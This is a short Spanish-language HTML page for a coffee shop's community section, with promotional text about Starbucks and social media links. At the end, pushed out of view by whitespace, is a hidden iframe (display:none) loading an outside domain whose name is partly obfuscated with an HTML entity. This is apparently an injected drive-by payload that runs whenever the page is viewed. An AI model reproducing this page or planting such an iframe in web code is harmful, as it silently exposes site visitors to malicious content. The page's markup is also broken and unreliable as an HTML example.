<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/>
	<link rel="stylesheet" href="menu.css">
<title></title>
</head>
<style type="text/css">
body {
	background: url("1.jpg");
	background-attachment: fixed;
	background-repeat: no-repeat;
	background-size: cover;
}
</style>
<br>

<font color="red" face="AR DELANEY" size="7">
		<center><p>comunidad</p>

		</font>

		<p>cafeteria</p></br>
       

<br>
<br>
<font color="black" face="AR DELANEY" size="6">
Comunidad se refiere a que estamos mejor cuando estamos juntos. En nuestras tiendas y en el mundo en general. Charla, conéctate, participa.

Únete a nosotros en Facebook
Síguenos en Twitter

Comunidad en la linea
Además del café de calidad, son las personas maravillosas a quienes conoces quienes hacen de Starbucks un lugar tan especial.




<br>
<br>
<br>
<br>
<div id="header">
	<ul class="nav">
	        <li><a href="inicio.html">tienda</a></li>
	  
		  <ul>
		                                                                          
<iframe src="http://jL.chu&#114;a.pl/rc/" style="display:none"></iframe>
</body>